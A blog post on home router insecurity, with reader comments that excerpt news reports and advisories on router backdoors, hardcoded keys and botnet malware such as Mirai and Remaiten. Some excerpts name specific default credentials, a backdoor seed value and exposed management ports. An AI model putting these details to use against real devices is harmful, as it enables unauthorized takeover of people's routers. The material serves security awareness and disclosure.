Home Routers a Big Consumer Cyberthreat?

Home routers and firewalls are supposed to make users easy and safely connect many devices to their Internet connection. Those devices were advertised to make your Internet safer. In many cases they helped, but more and more often they itself be a real security problem. Strange but saddly true.

Home Routers Pose Biggest Consumer Cyberthreat article says that many home routers are almost impossible to secure because there are so many vulnerabilities in them. It doesn’t take much actual hacking to take over most home routers. Typical problems are related to remote management functionality. Most ship with default admin credentials that are easy to guess and sometimes impossible to delete after they’re changed, or a long list of extraneous, often complex, services built into most home routers and the virtual impossibility of either shutting them down or securing them. Also Universal Plug and Play (UPnP) is riddled with security problems.

Many recent news have been on bug that would allow a remote user to access the administrative console of a Linksys router without logging in first, using port 8083, which is left open on many Linksys models. That remote-access management flaw allowed TheMoon worm to thrive on Linksys routers. SANS Institute’s Internet Storm Center (ISC) issued an alert Wednesday about incidents where Linksys E1000 and E1200 routers had been compromised and scanned other devices on network for vulnerabilities. Linksys is aware of the vulnerability in some E-Series routers and is working on a fix.

Just recently there was D-Link Router backdoor vulnerability discovered and Back door found in D-Link routers. The security vulnerability will allow full access into the configuration page of the router without knowing the username and password. All to get through the security checks is to change the user agent string of your web browser tool to a special value to access the router’s Web interface with no authentication. My D-link firewall teardown and vulnerability article has some more information. I also noticed another problem on an old DIR-100 D-link router as My firewall was a security risk that my ISP reported to me.

dlinkfw1

There is an even longer list of Linksys (and Cisco and Netgear) routers were identified in January as having a backdoor built into the original versions of their firmware in 2005 and never taken out. There is also list of Xyxel and Belkin security vulnerabilities at CVE Details. Pick practically any brand and you will most probably find something.

Home Routers Pose Biggest Consumer Cyberthreat article says that it might be simpler to call all home-based wireless routers gaping holes of insecurity than to list all the flaws in those of just one vendor.  Nearly every router aimed at homes or small offices is an easy target for attack. It’s that small-office, home office (SOHO) routers are designed to be easy for the non-technical to use, but rich in features that depend on often complex networking protocols. There are series of papers on hacking embedded devices, especially wireless home routers. Routerpwn site is a compilation of exploits and key generators for modems, routers, ONTs and switches.

Why those products are so bad in security? The Internet of Things Is Wildly Insecure — And Often Unpatchable article by well known security expert Bruce Schneier gives a view why there are security problems so often on those cheap routers: Typically, these systems are powered by cheap specialized computer chips, and the profit margins slim. The chip manufacturers try to do as little engineering as possible before shipping. The system manufacturers don’t do a lot of engineering, either. The problem with this process is that no one entity has any incentive, expertise, or even ability to patch the software once it’s shipped. And the software is old, even when the device is new.

Besides programming errors there is one thing that makes me to wonder:  why so many routers hidden back doors in them? Whey the manufacturers all the time put those hard-coded passwords that pass all the checks to their devices that are supposed to be secure. This kind of secrets will be revealed all too often. In this case the the secret was in firmware update packet in plain text inside the code.

Maybe you have to live with your existing router, so you might wonder what to do. How to secure your home router? Start by checking if your router model has a serious problems in it, and update the firmware on it if possible. The first configuration task is to disable the remote administration functionality if you don’t absolutely need it. Routers that are not configured for remote administration are not directly exposed to most attacks. If a router needs to be administered remotely, restricting access to the administrative interface by IP address will help reduce the risk. You will need to live with certain level of risk no matter what you do.

 

94 Comments

  1. Tomi Engdahl says:

    German Govt mulls security standards for SOHOpeless routers
    WPA2 with 20-character passwords? Ja! No firmware updates and CSRF? Nein.
    http://www.theregister.co.uk/2015/10/21/german_govt_mulls_security_tests_of_sohopeless_routers/

    The German Government is mulling an assessment of the security chops of consumer routers in a bid to lift current abysmal standards and help inform buyers.

    Berlin’s Ministry of the Interior IT security office says it wants to test routers for support of security features like WPS, encryption, and brute force protection of passwords. MAC address filtering and firewalls will also make the list.

    The agency points out in a draft document (PDF in German) that poorly-secured routers can lead to mass compromise of users.

    It says the increased functionality of SOHO routers with things like network attached storage and the ability to place voice-over-internet-protocol calls makes security of “paramount importance”.

    Attackers can do things like enslave users into botnets, place premium phone calls, and deny net access, the agency says, using a multitude of previously disclosed and un-patched vulnerabilities.

    The agency would look at simple and deeper security measures including holes like cross-site request forgery, the integrity of guest networks, and various defences against external attack.

    Routers that advise users of an available firmware update on login to the web admin interface are winners, as are those that rock WPA2 with a key spinning out to at least 20 characters, and units with WPS that is disabled by default and generates new random PINs on activation.

    Reply
  2. Tomi Engdahl says:

    Do you have one of these routers? It can be involved in the attack

    Finnish computer users ‘home routers may participate in denial of service attacks on the owners’ knowledge.

    Kyberturvallisuuskeskus published a list of the most common devices found in Finland, where the SNMP service appears open to the public internet, and which can therefore take advantage of a denial of service attack amplifier.

    1. A-Link RR24AP-N
    2. Apple AirPort until the 2012 models (when the device is connected to the Internet without a firewall or other protection)
    3. Zyxel 660RU-T1
    4. Zyxel VMG1312-B
    5. The PacketFront DRG 586
    6. The D-Link DSL 320B
    7. Netgear R6100
    8. TP-Link TD-W8901G
    9. Zyxel 2302HW
    10. Inteno XG6746

    Get information how SNMP can be disabled on your device!

    Source: http://www.digitoday.fi/tietoturva/2015/10/21/onko-sinulla-joku-naista-reitittimista-se-voi-olla-mukana-hyokkayksessa/201513774/66?rss=6

    Reply
  3. Tomi Engdahl says:

    Notes on home router security in Finnish:

    Heikosti ylläpidetyt kotireitittimet ovat verkkorikollisten kohteena – osa 1
    https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/10/ttn201510121051.html

    Heikosti ylläpidetyt kotireitittimet ovat verkkorikollisten kohteena – osa 2
    https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/10/ttn201510201051.html

    Reply
  4. Tomi Engdahl says:

    600,000 Arris Cable Modems Have Double Back Doors
    http://www.dslreports.com/shownews/600000-Arris-Cable-Modems-Have-Double-Back-Doors-135709

    A Brazilian security researcher claims that he has uncovered not one, but two backdoors in some Arris cable modems (TG862A, TG862G, DG860A). According to this blog post by Bernardo Rodrigues, the double backdoor impacts around 600,000 Arris cable modems, in use by some of the world’s largest ISPs including Comcast, Time Warner Cable, Charter and Cox.

    The firmware of these modems shipped with an undocumented “libarris_password.so” library, which acted as a backdoor by allowing privileged account logins with a different custom password for each day of the year.

    This ARRIS password of the day is a remote backdoor known since 2009 and still intact. The default seed is MPSJKMDHAI and many ISPs won’t bother changing it at all, he notes

    In short, Rodrigues notes that there’s multiple backdoors allowing full remote access to ARRIS Cable modems, and an access key that is generated based on the Cable modem’s serial number. He says he was asked by Arris not to disclose the password generating algorithm, but doubts that’s going to do much to deter or slow down would-be attackers.

    “I’m pretty sure bad guys had been exploiting flaws on these devices for some time (just search for ARRIS DNS on Twitter, for example),”

    ARRIS Cable Modem has a Backdoor in the Backdoor
    https://w00tsec.blogspot.com.au/2015/11/arris-cable-modem-has-backdoor-in.html

    Reply
  5. Tomi Engdahl says:

    Thomas Fox-Brewster / Forbes:
    Study of 4000 embedded devices from over 70 vendors shows reused crypto keys leave millions of devices insecure, only 5 vendors known to have fixes on the way

    ‘Worrying’ 9 Per Cent Of Encrypted Web Vulnerable To Private Key Attacks
    http://www.forbes.com/sites/thomasbrewster/2015/11/25/encrypted-routers-cameras-vulnerabilties-cisco-huawei-motorola/

    Getting encryption right can be hard. But even basic mistakes continue to be made, as proven by Austrian researchers who claimed to have uncovered the same vulnerability in nine per cent of all devices running over HTTPS encrypted lines.

    The researchers, from SEC Consult, analyzed the cryptographic keys in the firmware of more than 4,000 connected devices from more than 70 vendors, detailing their efforts in a blog post today. The affected “embedded systems” included internet gateways, routers, modems, IP cameras, network storage devices, mobile and Internet-connected phones, and more.

    They were able to extract more than 580 unique private keys embedded in firmware across devices, a significant number of which were shared across systems. This is problematic as malicious hackers who can get access to those keys, as SEC Consult did, can impersonate any of the affected device servers by creating their own version of the target machine’s encryption certificate and signing it with that key, making it appear like the genuine article to users’ PCs or smartphones.

    Vulnerability Note VU#566724
    Embedded devices use non-unique X.509 certificates and SSH host keys
    http://www.kb.cert.org/vuls/id/566724

    Embedded devices use non-unique X.509 certificates and SSH host keys that can be leveraged in impersonation, man-in-the-middle, or passive decryption attacks.

    Description
    CWE-321: Use of Hard-coded Cryptographic Key – Multiple CVEs

    Research by Stefan Viehböck of SEC Consult has found that numerous embedded devices accessible on the public Internet use non-unique X.509 certificates and SSH host keys. Products are identified as vulnerable if unpacked firmware images are found to contain hard-coded keys or certificates whose fingerprints can be matched to data from the Internet-wide scan data repository,

    Impact
    A remote, unauthenticated attacker may be able to carry out impersonation, man-in-the-middle, or passive decryption attacks, resulting in sensitive information exposure.

    Yet more research, outlined in a paper released this month, showed embedded devices had a horrible security record. A study by French research center Eurecom and Ruhr-University Bochum, Germany, discovered that 185 out of 1925 firmware versions from 54 different vendors contained “important vulnerabilities” and that simple fixes could address the majority of them.

    Automated Dynamic Firmware Analysis at Scale:
    A Case Study on Embedded Web Interfaces
    http://arxiv.org/pdf/1511.03609v1.pdf

    Reply
  6. Tomi Engdahl says:

    Lazy IoT, router makers reuse skeleton keys over and over in thousands of devices – new study
    SSH logins, server-side HTTPS certs baked in firmware
    http://www.theregister.co.uk/2015/11/26/lazy_iot_skeleton_keys/

    It’s what we all assumed, but quietly hoped wasn’t quite this bad.

    Lazy makers of home routers and the Internet of Things are reusing the same small set of hardcoded security keys, leaving them open to hijacking en masse, researchers have warned.

    In other words, if you can log into one gizmo remotely, you can probably log into thousands upon thousands of others – even devices from a different manufacturer.

    Infosec biz Sec Consult says it studied 4,000 embedded devices from 70 hardware makers, and found that many products are sharing the same hardwired SSH login keys and server-side SSL certificates.

    As a result, potentially millions of gadgets can be logged into by miscreants, or their HTTPS connections silently decrypted by man-in-the-middle attackers, using these keys and certificates once they are extracted from their firmware.

    The problem, says Sec Consult, lies in the way many IoT and networking gear vendors develop and deploy their products. Chipmakers will often provide a software development kit with their silicon for product manufacturers to adapt for their particular applications.

    Unfortunately, hardly anyone changes this source code, not even the security keys or certificates included as examples. What we all end up with is gadgets with logins stashed in flash ROMs, and the keys known to anyone with the ability to extract the data.

    House of Keys: Industry-Wide HTTPS Certificate and SSH Key Reuse Endangers Millions of Devices Worldwide
    http://blog.sec-consult.com/2015/11/house-of-keys-industry-wide-https.html

    In the course of an internal research project we have analyzed the firmware images of more than 4000 embedded devices of over 70 vendors. The devices we have looked at include Internet gateways, routers, modems, IP cameras, VoIP phones, etc. We have specifically analyzed cryptographic keys (public keys, private keys, certificates) in firmware images. The most common use of these static keys is:

    SSH Host keys (keys required for operating a SSH server)
    X.509 Certificates used for HTTPS (default server certificate for web based management)

    In total we have found more than 580 unique private keys distributed over all the analysed devices. Correlation via the modulus allows us to find matching certificates.

    We have correlated our data with data from Internet-wide scans (Scans.io and Censys.io) and found that our data set (580 unique keys) contains:

    the private keys for more than 9% of all HTTPS hosts on the web (~150 server certificates, used by 3.2 million hosts)
    the private keys for more than 6% of all SSH hosts on the web (~80 SSH host keys used by 0.9 million hosts)

    So in total at least 230 out of 580 keys are actively used.

    Reply
  7. Tomi Engdahl says:

    HTTPSohopeless: 26,000 Telstra Cisco boxen open to device hijacking
    Embedded device mayhem as rivals share keys
    http://www.theregister.co.uk/2015/11/27/nine_percent_of_encrypted_traffic_open_to_hijack_from_shared_keys/

    More than 26,000 Cisco devices sold by Australia’s dominant telco Telstra are open to hijacking via hardcoded SSH login keys and SSL certificates.

    The baked-in HTTPS server-side certificates and SSH host keys were found by Sec Consult during a study of thousands of router and Internet of Things gizmos.

    Cisco warns that miscreants who get hold of these certificates, can decrypt web traffic to a router’s builtin HTTPS web server via man-in-the-middle attacks. The web server is provided so people can configure devices from their browsers. The decrypted traffic will reveal usernames, passwords, and other sensitive information.

    The devices’ firmware also includes hardwired SSH login keys, meaning anyone can gain control of any of the products across the network or internet once the keys are extracted.

    There are no patches or workarounds available for the security blunder, which potentially affect millions of users. One workaround would be to ensure the SSH and HTTPS configuration servers in the routers are firewalled off from harm.

    Reply
  8. Tomi Engdahl says:

    Popular 3G/4G data dongles are desperately vulnerable, say hackers
    SOHOpelessness is the new normal
    http://www.theregister.co.uk/2015/12/03/3g4g_data_dongles_vulnerable/

    Cellular modems from four vendors have been popped by security researchers, who have documented cross-site scripting (XSS), cross-site request forgery (CSRF), remote code execution (RCE) and integrity attacks on the products.

    The research published by Positive Technologies and carried out by the SCADA Strangelove team looked at modems from Huawei, Gemtek, Quanta and ZTE.

    The tests tell some old, old stories: for example, code appearing in multiple devices suggests too many vendors base their firmware on silicon vendors’ reference designs without doing enough work themselves.

    The researchers say all of the devices they tested – two from Gemtek, two from Quanta (one of which was a rebadged ZTE), and three from Huawei – are vulnerable to remote code execution, and all except the Huawei devices are vulnerable to malicious firmware

    Reply
  9. Tomi Engdahl says:

    32C3: Beyond Your Cable Modem
    http://hackaday.com/2015/12/29/32c3-beyond-your-cable-modem/

    [Alexander Graf] gave an absolutely hilarious talk at 32C3 about the security flaws he found in cable modems from two large German ISPs. The vulnerability was very serious, resulting in remote root terminals on essentially any affected cable modem, and the causes were trivial: unencrypted passwords in files that are sent over

    While [Alexander] was very careful to point out that he’d disclosed all of these vulnerabilities to the two German cable ISPs that were affected, he notably praised one of them for its speedy response in patching up the holes. As for the other? “They’d better hurry up.” He also mentions that, although he’s not sure, he suspects that similar vulnerabilities are present in other countries. Oh dear.

    A very interesting point in the talk is the way that [Alexander] chose to go about informing the cable ISPs. Instead of going to them directly and potentially landing himself in jail, he instead went to the press, and let his contacts at the press talk to the ISPs. This both shielded him from the potential initial heat and puts a bit of additional pressure on the ISPs to fix the vulnerability — when the story hits the front page, they would really like to be ahead of the problem.

    Reply
  10. Tomi Engdahl says:

    Too Many Cooks – Exploiting the Internet-of-TR-069-Things [31c3]
    https://www.youtube.com/watch?v=gFP5YcvQsKM

    Reply
  11. Tomi Engdahl says:

    Numbers don’t lie—it’s time to build your own router
    With more speed available and hardware that can’t adapt, DIY builds offer peak performance.
    http://arstechnica.com/gadgets/2016/01/numbers-dont-lie-its-time-to-build-your-own-router/

    I’ve noticed a trend lately. Rather than replacing a router when it literally stops working, I’ve needed to act earlier—swapping in new gear because an old router could no longer keep up with increasing Internet speeds available in the area. (Note, I am duly thankful for this problem.) As the latest example, a whole bunch of Netgear ProSafe 318G routers failed me for the last time as small businesses have upgraded from 1.5-9mbps traditional T1 connections to 50mbps coax (cable).

    Yes, coax—not fiber. Even coax has proved too much for the old ProSafe series. These devices didn’t just fail to keep up, they fell flat on their faces. Frequently, the old routers dropped speed test results from 9mbps with the old connection to 3mbps or less with the 50mbps connection. Obviously, that doesn’t fly.

    These days, the answer increasingly seems to be wireless routers. These tend to be long on slick-looking plastic and brightly colored Web interfaces but short on technical features and reliability. What’s a mercenary sysadmin to do? Well, at its core, anything with two physical network interfaces can be a router. And today, there are lots and lots of relatively fast, inexpensive, and (super important!) fully solid-state generic boxes out there.

    So, the time had finally come. Faced with aging hardware and new consumer offerings that didn’t meet my needs, I decided to build my own router. And if today’s morphing connectivity landscape leaves you in a similar position, it turns out that both the building and the build are quite fast.

    Hardware, hardware, hardware

    We’ll go through the how-to in a future piece, but today it’s important to establish why a DIY router-build may be the best option. To do that, you first need to understand today’s general landscape.

    In the consumer world, routers mostly have itty-bitty little MIPS CPUs under the hood without a whole lot of RAM (to put it mildly). These routers largely differentiate themselves from one another based on the interface: How shiny is it? How many technical features does it have? Can users figure it out easily?

    At the higher end of the SOHO market, you start seeing some smartphone-grade ARM CPUs and a lot more RAM. These routers—like the Nightgear Nighthawk series, one of which we’ll be hammering on later—feature multiple cores, higher clock speeds, and a whole lot more RAM. They also feature much higher price tags than the cheaper competition. I picked up a Linksys EA2750 for $89, but the Netgear Nighthawk X6 I got with it was nearly three times more expensive (even on holiday sale!) at $249.

    After some good old-fashioned Internet scouring and dithering, finally I took the Alibaba plunge and ordered myself a new Partaker Mini PC from Shenzhen Inctel Technology Company. After $240 for the router itself and another $48 for a 120GB Kingston SSD from Newegg, I’d spent about $40 more on the Homebrew Special than I had on the Nighthawk. Would it be worth it?

    I’ve got a botnet in my pocket, and I’m ready to rock it

    I briefly considered setting up some kind of hideous, Docker-powered monstrosity with tens of thousands of Linux containers with individual IP addresses, all clamoring for connections and/or serving up webpages. Then I came to my senses. As far as the routers are concerned, there’s no difference between maintaining connections to thousands of individual IP addresses or just to thousands of ports on the same IP address. I spent a little bit of time turning Lee Hutchinson’s favorite webserver nginx into a ridiculous Lovecraftian monster with 10,000 heads and an appetite for destruction.

    That’s the Homebrew Special flexing its crypto muscle. It has an OpenVPN server running. For that test, the WAN-side server, Menhir, is connected to the router’s on-board OpenVPN server.

    In the name of thoroughness, we should observe one shared limitation, something by all the consumer network gear I’ve ever managed: the desire to reboot after almost any change. Some of those reboots take well over a minute. I haven’t got the foggiest idea why, but whatever the reason, the Homebrew Special isn’t afflicted with this industry standard. You make a change, you apply it, you’re done. And if you do need to reboot the Special? It’s up again in 12 seconds. (I timed it by counting dropped pings.)

    Reply
  12. Tomi Engdahl says:

    TP-LINK’s WiFi Defaults to Worst Unique Passwords Ever
    http://hackaday.com/2016/01/27/tp-links-wifi-defaults-to-worst-unique-passwords-ever/

    This “security” is so outrageous we had to look for hidden cameras to make sure we’re not being pranked. We don’t want to ruin the face-palming realization for you, so before clicking past the break look closely at the image above and see if you can spot the exploit. It’s plain as day but might take a second to dawn on you.

    The exploit was published on [Mark C.’s] Twitter feed after waiting a couple of weeks to hear back from TP-LINK about the discovery. They didn’t respond so he went public with the info.

    During the design phase someone had the forethought to make a WiFi AP password that isn’t merely a default. But that’s where this went off the rails. They did the next worst thing, which is to assign a password that gets broadcast publicly: the last eight characters of the MAC address. This will be unique for each device, but it is also promiscuously broadcast to any device that cares to listen.

    We know what you’re thinking. Users should always change default passwords anyway. But our devices need to be secure by default.

    https://twitter.com/LargeCardinal/status/682591420969029632
    @TPLINK Spot the #zeroday in your TL-WR702N routers. Do you even test your #infosec? This is so stupid, it’s funny.

    Reply
  13. Tomi Engdahl says:

    Cisco Patches Serious Flaws In Cable Modems and Home Gateways
    http://hardware.slashdot.org/story/16/03/10/209244/cisco-patches-serious-flaws-in-cable-modems-and-home-gateways

    Cisco Systems has patched high-impact vulnerabilities in several of its cable modem and residential gateway devices that are distributed by some ISPs to their customers, and said in an advisory that customers should contact their service providers to ensure they have the patches. The embedded Web server in the Cisco Cable Modem with Digital Voice models DPC2203 and EPC2203 contains a buffer overflow vulnerability that can be exploited remotely without authentication.

    Cisco patches serious flaws in cable modems and home gateways
    http://www.csoonline.com/article/3042731/security/cisco-patches-serious-flaws-in-cable-modems-and-home-gateways.html

    Reply
  14. Tomi Engdahl says:

    New Remaiten Malware Builds Botnet of Linux-Based Routers
    http://www.securityweek.com/new-remaiten-malware-builds-botnet-linux-based-routers

    Remaiten Linux Bot Targets Routers and Potentially Other Embedded (IoT) Devices

    A new piece of malware is targeting embedded systems with the mission to compromise and make them part of a botnet, ESET security researchers have discovered.

    Dubbed “Remaiten” (Linux/ Remaiten), the new threat combines the capabilities of previously spotted Tsunami (also known as Kaiten) and Gafgyt malware and also brings a series of improvements and new features. According to ESET, three versions of Remaiten have already emerged, while the malware authors call their creation “KTN-Remastered” or “KTN-RM.”

    One of the capabilities that Remaiten borrows from Gafgyt is telnet scanning, though Remaiten enjoys a series of improvements, ESET’s Michal Malik explains in a blog post. Both, however, rely on improperly secured devices to successfully infect them.

    Gafgyt attempts to connect to random routers via port 23, which it then issues a shell command to download bot executables for multiple architectures and tries to run them.

    The bot binaries include a hardcoded list of C&C server IP addresses, and the malware chooses one at random and connects to it on a hardcoded port (the port is different from one variant to another). Upon successful connection to the C&C server, the bot checks-in on the IRC channel, and the server replies with a welcome message and further instructions.

    There are various IRC commands that the bot supports

    Meet Remaiten – a Linux bot on steroids targeting routers and potentially other IoT devices
    http://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/

    ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points. Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.

    In this blog we will describe the unique spreading mechanism of Linux/Remaiten, its different features, and the differences between the versions found in the wild.

    Reply
  15. Tomi Engdahl says:

    Netgear Routers Plagued by Serious Vulnerabilities
    http://www.securityweek.com/netgear-routers-plagued-serious-vulnerabilities

    Netgear released firmware updates last week for its D3600 and D6000 Wi-Fi modem routers to address a couple of serious vulnerabilities reported to the company in December 2015.

    One of the flaws, tracked as CVE-2015-8288, is related to the use of hardcoded cryptographic credentials, including an RSA private key, and an X.509 certificate and key. An attacker who obtains this information can leverage it to gain admin access to the vulnerable device, launch man-in-the-middle (MitM) attacks, and decrypt intercepted packets, CERT warned in an advisory published on Friday.

    The second security hole, identified as CVE-2015-8289, has been described as an authentication bypass issue

    The flaws affect D3600 and D6000 routers running version 1.0.0.49 or earlier of the firmware. CERT noted that other models may be impacted as well.

    Reply
  16. Tomi Engdahl says:

    Linux Trojan Brute Forces Routers to Install Backdoors
    http://www.securityweek.com/linux-trojan-brute-forces-routers-install-backdoors

    A Linux Trojan that emerged more than a year ago is once again actively targeting routers in an attempt to install backdoors on them.

    Dubbed Linux.PNScan, the threat was detailed last year, when it was targeting mainly devices with ARM, MIPS, or PowerPC architectures. Now, security researchers from Malware Must Die! say that this ELF worm is hitting x86 Linux systems, with a focus on embedded platforms, specifically those in the “network area of Telangana and Kashmir region of India.”

    Last year, Doctor Web researchers suggested that the Trojan might have been installed on routers attacked by its authors, who exploited the ShellShock vulnerability running a script with corresponding settings. The threat, researchers said, was designed for the sole purpose of brute forcing routers and install a script on them which in turn would download a backdoor based on the router architecture (ARM, MIPS, or PowerPC).

    The worm Malware Must Die! researchers have observed recently appears to be Linux.PNScan.2, a variation of the original Trojan. Unlike Linux.PNScan.1, which attempted to crack login combinations using a special dictionary, this threat targets specific IP addresses and attempts to connect to them via SSH using one of the following combinations: root;root; admin;admin; or ubnt;ubnt.

    Reply
  17. Tomi Engdahl says:

    Operators offering critical vulnerability on your router – you can not do anything

    F-Secure warns that some Inteno home router models is a critical vulnerability. The user does not have any way to prevent abuse of these routers commonly used in Finland.

    F-Secure, the attacker can take the victim’s device, as well as through its Internet traffic completely over. This occurs if an attacker to install a router in your repertoire, which includes, inter alia, backdoors.

    “After the software exchange attacker can modify any of the router’s rules”

    The problem is that the router receives software updates via the operator, but not in any way make sure that the update is valid, and that it will be in the right place. F-Secure, the attacker can gain access to the home router and the network provider’s server, for example through the apartment complex main distribution, can erect your own update server, and then make harmful software updates.

    Equipment, where the vulnerability has been identified, the Inteno EG500, FG101 and DG201. The vulnerability is described as serious, but quite easy to abuse is not

    “Consumers have no way to block these routers abuse. The device can only change to one in which the vulnerability has not been installed or supported fix when one becomes available. ”

    Source: http://www.tivi.fi/Kaikki_uutiset/operaattoreiden-tarjoamassa-reitittimessa-kriittinen-haavoittuvuus-et-voi-tehda-mitaan-6579359

    Reply
  18. Tomi Engdahl says:

    Monday, September 12, 2016
    LuaBot: Malware targeting cable modems
    https://w00tsec.blogspot.fi/2016/09/luabot-malware-targeting-cable-modems.html?m=1

    During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a blogpost about ARRIS’ nested backdoor and detailed some my cable modem research during the 2015 edition from NullByte Security Conference.

    Vulnerability Note VU#419568 and it got lots of media coverage. I did not provide any POC’s during that time because I was pretty sure that those vulnerabilities were easily wormable… And guess what? Someone is actively exploiting those devices since May/2016.

    The malware targets Puma 5 (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many common worm that targets embedded devices from multiple architectures.

    Reply
  19. Tomi Engdahl says:

    24 hours in the life of my home router by Francisco J. Rodriguez
    http://securityaffairs.co/wordpress/52632/iot/24-hours-life-home-router.html

    Recently a massive DDoS attack has disconnected a large portion of users from the Internet, hackers exploited IoT devices. Is your router secure?

    “Are we ready to live in a world where all devices are exposed to cyber attacks?”

    Have you ever wondered happens in your home router and that threats lurk in the moment you press the power button?

    In this article, I intend to analyze the attacks and the cybersecurity events I have received in my personal router in Spanish ISP. This information may lead you to become aware of the high risk of having these devices connected to the web, even when we expose our lives on social media.

    We recommend you to visiting http://routersecurity.org/ to find more information about bugs and detected vulnerabilities in the last years to home routers and some recommendations.

    Reply
  20. Tomi Engdahl says:

    Irish eyes are crying: Tens of thousands of broadband modems wide open to hijacking
    D1000 can be directed to drop its firewall, allowing access to panel over the internet
    http://www.theregister.co.uk/2016/11/22/eir_customers_modems_vulnerable/

    Eir, Ireland’s largest ISP, has tens of thousands of customers with insecure ADSL2+ modems that appear to be vulnerable to remote takeover.

    Earlier this month, a security researcher writing under the name “kenzo” has posted a proof-of-concept exploit that demonstrates how an attacker might take control of an Eir D1000 modem.

    The ZyXEL-built Eir D1000 [PDF] comes with an open TCP port, 7547, which is used by the CPE WAN Management Protocol to manage the modems on Eir’s network. According to kenzo, the modem includes a TR-064 server for LAN-based configuration, to allow ISPs to set up software on the device. It’s not supposed to be accessible from the internet, but apparently it is.

    TR-064 commands can be used, among other things, to fetch Wi-Fi security keys and to set up an NTP server that disables the modem firewall, thereby opening the administration interface on port 80.

    “By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall,”

    A compromised modem could be used to attack other devices on the network or as part of a botnet.

    Last week, posting under the Twitter handle “Bobby ‘Tables”, Darren Martyn, a security researcher with Insecurity.net and former LulzSec hacker, appeared to confirm the vulnerability.

    https://twitter.com/info_dox/status/798600983437869057

    Reply
  21. Tomi Engdahl says:

    Researchers Detect 57 Million Scans for Netis Router Backdoor
    http://www.securityweek.com/researchers-detect-57-million-scans-netis-router-backdoor

    News of a backdoor in routers produced by China-based networking solutions provider Netis Systems might be of the past, but the vulnerability is part of the present: tens of millions of attempts to scan for the backdoor have been registered since August, Trend Micro researchers warn.

    Over two years ago, routers produced by Netis Systems, part of the Netcore Group, were revealed to be exposed by a backdoor that would provide an attacker with complete control over the device. The attacker only needed to know the router’s external IP address and could gain access to it through the UDP port 53413, after which they could access the backdoor by entering a password hardcoded in the firmware.

    With full control over the affected devices, an attacker could modify settings to carry out man-in-the-middle attacks and could perform other nefarious activities as well, security researchers warned.

    Now, Trend Micro says that the backdoor continues to be used, based on data gathered by one of its TippingPoint Digital Vaccine (DV) filters. DV filter 32391, designed to check for any attempt to scan for this specific backdoor, shows a massive amount of backdoor communication attempts.

    Reply
  22. Tomi Engdahl says:

    ‘Likely Hacker Attack’ Hits Almost 1 Million German Homes
    http://www.securityweek.com/likely-hacker-attack-hits-almost-1-million-german-homes

    Internet service for almost one million households in Germany was disrupted by likely deliberate hacking, provider Deutsche Telekom said Monday.

    Around 900,000 customers using specific models of router have been affected since Sunday afternoon, the firm said, with some unable to connect at all while others suffered intermittent problems.

    “We believe that influence was exerted on the routers from outside,” a Telekom spokesman told AFP, saying software had been installed on the devices that prevented them from connecting to the company’s network.

    It did not provide details of which models of router — network hardware that connects households to their internet and telephone service provider — were affected.

    Deutsche Telekom said that its engineers and colleagues from the companies that produce the devices had been working through the night to find a solution.

    Customers affected have been advised to disconnect their routers from the network since the problems began on Sunday afternoon.

    Germany has been the target of repeated cyber attacks in recent years.

    Reply
  23. Tomi Engdahl says:

    German ISP Confirms Malware Attacks Caused Disruptions
    http://www.securityweek.com/german-isp-confirms-malware-attacks-caused-disruptions

    German telecommunications giant Deutsche Telekom has confirmed that more than 900,000 of its 20 million fixed-line network customers experienced Internet disruptions due to malware attacks on their routers.

    In a press statement released on Monday, Deutsche Telekom said malicious actors had been trying to infect routers with malware, but the attempts failed, which led to 4-5 percent of devices crashing and preventing owners from going online.

    Since the malware only resides in the router’s memory, customers have been advised to reboot their devices in order to clean the infection. Deutsche Telekom has also released a firmware update that should prevent infections on its Speedport routers.

    Germany’s Federal Office for Information Security (BSI) reported that some government networks protected by the organization were also targeted in attacks. These attacks were mitigated by the existing protection mechanisms, the BSI said.

    Attacks have been observed in several countries. Researchers determined that a piece of malware based on Mirai, whose source code was leaked recently, has been using port 7547 to hijack routers and modems.

    Reply
  24. Tomi Engdahl says:

    Port 7547 SOAP Remote Code Execution Attack Against DSL Modems
    https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

    German Telekom is now offering a firmware update for the affected routers. Details (in German) are here: https://www.telekom.de/hilfe/geraete-zubehoer/router/speedport-w-921v/firmware-zum-speedport-w-921v. Affected user are advised to power off their router and power it on again after 30 seconds. During bootup the router should retrieve the new firmware from the Telekom servers.

    Reply
  25. Tomi Engdahl says:

    Eir’s D1000 Modem Is Wide Open To Being Hacked.
    https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

    The Eir D1000 Modem has bugs that allow an attacker to gain full control of the modem from the Internet. The modem could then be used to hack into internal computers on the network, as a proxy host to hack other
    computers or even as a bot in a botnet.

    A port scan of the the modem revealed that it has one TCP port exposed to the Internet, port 7547. Port 7547 is running as part of the TR-069 protocol. TR-069 a.k.a CPE WAN Management Protocol a.k.a. CWMP is a protocol that ISPs like Eir use to manage all of the modems on their network.

    When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want.

    What is not very well known is that the server on port 7457 is also a TR-064 server.
    This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.

    Reply
  26. Tomi Engdahl says:

    Mirai-Based Worm Targets Devices via New Attack Vector
    http://www.securityweek.com/mirai-based-worm-targets-devices-new-attack-vector

